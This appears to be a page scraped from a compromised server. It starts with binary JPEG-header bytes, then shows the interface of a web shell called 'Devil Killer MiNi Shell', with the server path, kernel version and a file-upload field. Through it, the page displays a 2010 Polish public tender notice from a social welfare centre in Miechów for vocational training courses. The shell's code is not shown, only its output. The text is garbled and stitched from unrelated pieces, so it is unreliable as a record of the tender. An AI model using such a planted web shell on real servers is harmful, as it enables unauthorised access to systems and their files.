JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100910/287308-N-2010.html

<p class="kh_header"><b>Miechów: Zorganizowanie i przeprowadzenie kursów zawodowych w ramach projektu Aktywizacja Twoją szansą. Program aktywizacji społeczno - zawodowej osób i rodzin wieloproblemowych z gminy Miechów w Gminie Miechów. Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 287308 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Miechowie , ul. Szpitalna 1, 32-200 Miechów, woj. małopolskie, tel. 41 38 211 60, faks 41 38 211 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopsmiechow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów zawodowych w ramach projektu Aktywizacja Twoją szansą. Program aktywizacji społeczno - zawodowej osób i rodzin wieloproblemowych z gminy Miechów w Gminie Miechów. Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych w specjalności Operator koparko-ładowarki wszystkie typy klasa III - 3 osoby, - Kurs gastronomiczny - kucharz - 3 osoby, Kurs prawa jazdy kat. B -  4 osoby, Kurs komputerowy - 1 osoba  w ramach projektu  Aktywizacja Twoją szansą. Program aktywizacji społeczno - zawodowej osób i rodzin wieloproblemowych z gminy Miechów w Gminie Miechów. Projekt realizowany w ramach Działania 7.1 Programu Operacyjnego Kapitał Ludzki, Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.

Zamawiający dopuszcza możliwość składania ofert częściowych gdzie część stanowi każdy rodzaj kursu oddzielnie. 

REALIZACJA KURSÓW ZAWODOWYCH - WYMAGANIA OGÓLNE:

1.	Określone kursy zawodowe należy przeprowadzić w zakresie wiedzy teoretycznej i praktycznej z zakresu, jaki obejmuje kurs zgodnie z obowiązującymi przepisami oraz w ilości godzin umożliwiający przystąpienie do egzaminu oraz uzyskaniu pełnych uprawnień po ukończeniu danego kursu. 
2.	Pożądane jest aby zajęcia były przeprowadzane w Miechowie z każdą grupą odrębnie stosownie do rodzaju kursu. W przypadku braku takiej możliwości dojazd do miejsca gdzie prowadzone będą zajęcia nie może przekraczać 100km wliczając tym samym w cenę oferty koszty dojazdu z Miechowa. 
3.	Zajęcia na szkoleniach powinny odbywać się w godzinach od 8 do 20, maksymalnie 8 godzin dziennie, w systemie tygodniowym od poniedziałku do piątku, w uzasadnionych przypadkach również w soboty. 
4.	Wykonawca powinien dostosować ilość i jakość pomieszczeń do zajęć teoretycznych i zajęć praktycznych.
5.	Wykonawca powinien wyposażyć uczestników kursu w sprzęt i pomoce dydaktyczne niezbędne do przeprowadzenia danego szkolenia, z uwzględnieniem bezpiecznych i higienicznych warunków pracy.
6.	Wykonawca, który złoży najkorzystniejszą ofertę, przedstawi przy zawieraniu umowy konspekt godzinowy dla realizacji programu nauczania odpowiedniego kursu zawodowego, w ramach ilości godzin przeznaczonych na naukę w danym kursie, zgodnie z wiedzą, doświadczeniem i obowiązującym prawem dotyczącym organizacji kursów zawodowych. Konspekt stanowić będzie załącznik do umowy.
7.	Wykonawca w ramach oferowanej ceny zapewni każdemu uczestnikowi materiały dydaktyczne/szkoleniowe, które z chwilą przekazania będą stanowiły jego własność:
	podręcznik/skrypt - literaturę wspomagającą przygotowanie do egzaminu końcowego
	zeszyt (notatnik)
	zestaw piśmienniczy (ołówek oraz długopis)
8.	Zamawiający wymaga, aby Wykonawca w swojej ofercie uwzględnił wszystkie koszty związane z organizacją i przeprowadzeniem kursu, a w szczególności:
	koszt wynagrodzenia wykładowcy - instruktora,
	koszt wynajmu sali,
	koszt materiałów dydaktycznych, szkoleniowych,
	koszt badań lekarskich - wykonanych minimum na 1 tydzień przed pierwszymi zajęciami,
	koszt odzieży ochronnej - roboczej,
	koszt egzaminów teoretycznych i  praktycznych, po zaliczeniu których uczestnik otrzyma wymagane certyfikaty lub uprawnienia, w cenę oferty nie należy wliczać egzaminów powtórkowych jeśli uczestnik nie zda egzaminu w pierwszym terminie. 
	opłat za dojazd uczestników szkoleń do miejsca, w którym przeprowadzone będą kursy, w przypadku gdy wystąpi konieczność dojazdu uczestnika kursu na zajęcia z Miechowa
	opłat za dojazd uczestników szkoleń do miejsca, w którym przeprowadzone będą egzaminy, w przypadku gdy wystąpi konieczność dojazdu uczestnika kursu na zajęcia z Miechowa
	materiały dydaktyczne/szkoleniowe przekazane uczestnikom
9.	Wykonawca ma obowiązek prowadzić ewidencję obecności uczestników kursu i zobowiązany jest do pisemnego informowania Zamawiającego o powtarzających się nieobecnościach każdego z uczestników w przypadku przekroczenia 10% absencji.
10.	Wykonawca powinien prowadzić dzienniki zajęć oraz przeprowadzić ankiety ewaluacyjne na początku i na końcu kursu.
11.	Wykonawca zobowiązany jest prowadzić dzienniki zajęć oznaczone (zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki), w których powinny zostać wpisane:
a) Nazwa i termin kursu
b) Ewidencja obecności
c) Dane uczestników kursu w formie listy obecności
d) Wpisywana na bieżąco tematyka kursów oraz ilość godzin
e) Informacje o odbytych kontrolach itp.
f) Jeżeli kurs zakończy się egzaminem to również wyniki egzaminu
12.	Wykonawca może skreślić osobę z listy uczestników, z powodu nie uczęszczania na zajęcia, tylko i wyłącznie na wniosek Zamawiającego. W przypadku rezygnacji lub skreślenia z listy uczestników projektu, Zamawiający zapłaci za faktyczną ilość osób, która przystąpi do realizacji kursu, tj. weźmie udział w minimum 1 dniu szkoleniowym.
13.	Zamawiający zastrzega sobie prawo do zmiany liczby uczestników (odbiorców usług) w sytuacjach niezależnych od zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy np. choroba uczestnika itp. O zaistniałej sytuacji Zamawiający pisemnie zawiadomi niezwłocznie wykonawcę.
14.	Ponadto zamawiający zastrzega, że jeśli którykolwiek z uczestników projektu z różnych przyczyn nie będzie mógł wziąć udziału kursie zawodowym w terminie ustalonym z zamawiającym wówczas Kurs zostanie przeprowadzony w późniejszym terminie, po uzgodnieniu z koordynatorem lokalnym GOPS w Miechowie.
15.	Wszelkie rozliczenia końcowe miedzy zamawiającym a wykonawcą zrealizowanych usług a  szczególności w rozliczenia w sytuacjach powodujących zmiany liczby uczestników zajęć dokonane zostaną na podstawie cen jednostkowych określonych w kosztorysie ofertowym przez wykonawcę.
16.	W przypadku stwierdzenia przeciwwskazań lekarskich do uczestnictwa w danym kursie zawodowym, Zamawiający zastrzega sobie możliwość:
a.	wykreślenia uczestnika z listy uczestników w przedmiotowym kursie, a Wykonawca nie otrzyma wynagrodzenia.
b.	zmiany kursu dla danego uczestnika. Zamiana kursu może dotyczyć tylko zmiany kursu na inny przedstawiony w SIWZ. Zamiana taka nie może spowodować zwiększenia ogólnej kwoty zamówienia. 
Przy realizacji zamówienia brana pod uwagę będzie cena jednostkowa za dany kurs przedstawiony w ofercie przetargowej.
17.	Na uzasadniony wniosek Zamawiającego, Wykonawca zobowiązany jest zastąpić dotychczasowego nauczyciela lub instruktora innym nauczycielem lub instruktorem gwarantującym należyte i terminowe prowadzenie kursów.
18.	Termin realizacji kursów musi być dopasowany do harmonogramu Zamawiającego i uzgodniony z koordynatorem lokalnym GOPS w Miechowie.
19.	Wykonawca zobowiązany jest do zapewnienia prawidłowej promocji kursów z określeniem nazwy kursu, nazwy zamawiającego oraz nazwy projektu w uzgodnieniu z koordynatorem lokalnym GOPS w Miechowie. Wszystkie materiały muszą być opatrzone właściwym logo flagi Unii Europejskiej - Europejskiego Funduszu Społecznego wraz z odniesieniem i Kapitału Ludzkiego.
20.	Wykonawca wyznaczy osobę, która będzie koordynatorem kursu, w celu zapewnienia prawidłowej organizacji zajęć. Koordynator kursu jest zobowiązany do ścisłej współpracy z koordynatorami lokalnym w GOPS Miechów.
21.	Zamawiający zastrzega prawo wglądu do dokumentów Wykonawcy związanych z realizowanym Projektem, w tym dokumentów finansowych, przez siebie oraz instytucje uprawnione do kontroli dokumentacji niniejszego projektu.

Rozliczenie i termin płatności nastąpi przelewem na rachunek bankowy Wykonawcy zgodnie z projektem umowy. Do faktury Zamawiający zobowiązany jest dołączyć następujące dokumenty (oznaczone zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki):
	oryginały imiennych list obecności, potwierdzonych własnoręcznym podpisem uczestników kursów
	terminy realizacji zajęć i ilość godzin (harmonogramy)
	kserokopie dzienników zajęć (osobny dziennik dla każdej jednostki, w której przeprowadzane są kursy)
	kserokopie zaświadczeń o udziale w kursach, wraz z zakresem tematycznym i godzinowym
	imienne listy osób wraz z ich podpisami, potwierdzające odbiór materiałów dydaktycznych i pomocniczych
	kopia dokumentów poświadczających zdanie egzaminu, 
Kserokopie przekazywanych dokumentów muszą być potwierdzone za zgodność z oryginałem na każdej stronie.
22.	W związku z możliwymi opóźnieniami w przekazywaniu funduszy z Europejskiego Funduszu Społecznego, płatność może zostać dokonana w terminie późniejszym, nie dłuższym jednak niż 30 dni od daty przekazania środków do dyspozycji Zamawiającego.
23.	Wykonawca musi działać zgodnie z Ustawą o Ochronie Danych Osobowych (Dz. U. 2002 r. nr 101, poz. 926, tekst jednolity).

Wyszczególnienie rodzajów kursów - zadań częściowych.
 
1.	zadanie częściowe nr 1 - Kurs operatora koparko-ładowarki wszystkie typy klasa III - 3 osoby

Cel: nabycie nowych i rozwój posiadanych umiejętności zawodowych poprzez przygotowanie osób do wykonywania zawodu operatora koparko-ładowarki wszystkie typy klasa III
Zakres tematyczny zajęć:

L.p.	Przedmiot nauczania	Liczba godzin nauczania
Ogółem	176
1.	Użytkowanie eksploatacyjne	8
2.	Dokumentacja techniczna	8
3.	Bezpieczeństwo i higiena pracy	8
4.	Podstawy elektrotechniki	8
5.	Silniki spalinowe	16
6.	Elementy hydrauliki	16
7.	Budowa koparko-ładowarki	32
8.	Technologia robót	20
9.	Zajęcia praktyczne	60

Liczba godzin szkoleniowych - minimum 176 godzin + egzamin
Kurs musi zakończyć się egzaminem państwowym przed komisją Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz uzyskaniem uprawnień przez uczestnika do wykonywania zawodu operatora koparko-ładowarki


2.	zadanie częściowe nr 2 - Kurs gastronomiczny - Kucharz - 3 osoby

Cel: nabycie nowych i rozwój posiadanych umiejętności zawodowych poprzez przygotowanie uczestników kursu do pracy w kuchni na stanowisku kucharza w szczególności poznanie zasad żywienia, organizacji produkcji, przepisów kulinarnych.

Zakres tematyczny zajęć:
	Zasady BHP i minimum sanitarne
	Ekonomia organizacyjna
	Obsługa konsumenta
	Technologie gastronomiczne z towaroznawstwa
	Maszyny i sprzęty (wyposażenie techniczne): budowa, obsługa, zastosowanie
	Kuchnia i jej zagadnienia:
	Podstawy żywienia człowieka
	Obróbka termiczna mięsa
	Sporządzanie potraw z mięsa, zwierząt rzeźnych i dziczyzny
	Sporządzanie potraw z ryb
	Sporządzanie potraw półmięsnych i jarskich
	Przygotowanie sosów gorących
	Przygotowanie deserów oraz napojów zimnych i gorących
	Przygotowanie zakąsek
	Sporządzanie potraw dietetycznych
	Sporządzanie potraw kuchni staropolskiej oraz kuchni innych narodów
	Sporządzanie potraw na przyjęcia okolicznościowe i inne imprezy specjalne
	Warsztaty ogólnorozwojowe z treningiem interpersonalnym
	zajęcia praktyczne ( Restauracje, Puby, Stołówki)

Liczba godzin szkoleniowych: minimum 50 godz. teoretycznych 130 praktycznych + egzamin. Godzina szkolenia teoretycznego równa się 45 minutom, a szkolenia praktycznego 60 minutom.
	Wykonawca zapewni warunki szkolenia zgodne z przepisami BHP. 
	Wykonawca wyposaży kursantów w ubrania robocze (fartuch, okrycia głowy, rękawice, obuwie). 
	Wykonawca zapewnia wszelkie niezbędne materiały szkoleniowe i dydaktyczne związane z przeprowadzeniem kursu tj. produkty żywnościowe na warsztaty symulacyjne, podręczniki, zeszyty, długopisy, teczki na materiały szkoleniowe

Szkolenie winno zakończyć się wydaniem zaświadczenia o ukończeniu szkolenia zgodnie z rozporządzeniem MEN z dnia 03.02.2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006, Nr 31 poz.216).
Zamawiający zaleca, aby Wykonawca prowadził nadzór wewnętrzny nad szkoleniem służący podnoszeniu jakości organizowanego kursu.
Zamawiający zaleca, aby Wykonawca sprawdzał efekty szkolenia między innymi poprzez: aktywność kursantów, frekwencję na zajęciach, pracę końcową, zaliczenie całego programu, egzamin.

3.	zadanie częściowe nr 3 - Kurs prawa jazdy kat. B - 4 osoby
Cel: nabycie uprawnień przez uczestnika kursu do kierowania pojazdami o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t
	Kurs musi być przeprowadzony zgodnie z Rozporządzeniem Ministra Infrastruktury z 27 października 2005 roku z późniejszymi zmianami (Dz.U. Nr 217 z dnia 31 października 2005r.) w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów

Liczba godzin szkoleniowych - min. 30 godzin teoretycznych, min. 30 godzin praktycznych + egzamin. Godzina szkolenia teoretycznego równa się 45 minutom, a szkolenia praktycznego 60 minutom. 
Kurs winien zakończyć się egzaminem oraz uzyskaniem uprawnień do kierowania pojazdami o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t (kat. B)
4.	zadanie częściowe nr 4 - Kurs komputerowy - 1 osoba
Cel: nabycie przez uczestników kursu specjalistycznych umiejętności w zakresie samodzielnego administrowania sieciami komputerowymi. 
Zakres przedmiotowy szkolenia winien zawierać teoretyczne zagadnienia dotyczące architektury, technologii i bezpieczeństwa sieci komputerowych, praktyczne umiejętności w zakresie administrowania sieciami takich systemów jak: Windows, NetWare, Linux.

Zakres tematyczny zajęć:

I. Wiadomości ogólne
1. Rodzaje sieci komputerowych 
2. Zadania administratora 
3. Urządzenia sieciowe 
4. Rodzaje kabli 
5. Model OSI 
6. Protokoły sieciowe 
7. Adresowanie IP 
8. Sieci peer-to-peer 
9. Zarządzanie serwerem 
10. Bezpieczeństwo

II. Sieci z serwerem Windows
1. Grupy robocze i domeny
2. Użytkownicy i grupy
3. Uprawnienia do plików i folderów
4. Drukowanie w sieci
5. Praca z dyskami
6. Logowanie do serwera
7. DHCP, WINS

III. Sieci z systemem Novell NetWare
1. Wiadomości ogólne
2. Użytkownicy i grupy
3. Uprawnienia do plików i folderów
4. Prawa obiektowe
5. Logowanie do serwera
6. Praca z dyskami
7. Skrypty logowania

IV. Podstawy systemu Linux
1. Wprowadzenie do systemu
2. Użytkownicy i ich prawa
3. Praca z dyskami i plikami
V. Serwer z systemem Linux 
1. Logowanie do serwera 
2. Zarządzanie obiektami 
3. Serwer plików Samba 
4. Drukowanie (Samba, CUPS)
5. Zarządzanie serwerem Apache

Szkolenie winno zakończyć się wydaniem zaświadczenia o ukończeniu szkolenia zgodnie z rozporządzeniem MEN z dnia 03.02.2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006, Nr 31 poz.216).
Zamawiający zaleca, aby Wykonawca prowadził nadzór wewnętrzny nad szkoleniem służący podnoszeniu jakości organizowanego kursu.
Zamawiający zaleca, aby Wykonawca sprawdzał efekty szkolenia między innymi poprzez: aktywność kursantów, frekwencję na zajęciach, pracę końcową, zaliczenie całego programu, egzamin.

Liczba godzin szkoleniowych (lekcyjnych) - min. 30 godzin teoretycznych, min. 90 godzin praktycznych + egzamin. Godzina szkolenia teoretycznego równa się 45 minutom, a szkolenia praktycznego 60 minutom.

Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień Publicznych (CPV) 
- Usługi szkolenia zawodowego: CPV 80530000 - 8,
- Kursy komputerowe: CPV 80533200-1
- Usługi szkolenia komputerowego : CPV 80.53.31.00 - 0

IV. Opis części zamówienia, jeżeli zamawiający dopuszcza składanie ofert częściowych.
1.	Zamawiający dopuszcza możliwości składania ofert częściowych gdzie część stanowi każdy rodzaj kursu opisany w opisie przedmiotu zamówienia jako:
	zadanie częściowe nr 1 - kurs operatora koparko-ładowarki, 
	zadanie częściowe nr 2 - kurs gastronomiczny - kucharz,
	zadanie częściowe nr 3 - kurs prawa jazdy kat. B,
	zadanie częściowe nr 4 - kurs komputerowy
2.	Zamawiający nie dopuszcza składania ofert wariantowych.
1.	Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
2.	Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.32.00-1, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wmaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że posiada uprawnienia do organizowania i przeprowadzania kursów/szkoleń objętych niniejszym zamówieniem, Zamawiający wymaga, aby wykonawca wykazał, że: jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje:
a.	co najmniej 1 usługę polegającą na zorganizowaniu kursu - szkolenia odpowiednio do rodzaju kursu - szkolenia na które składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
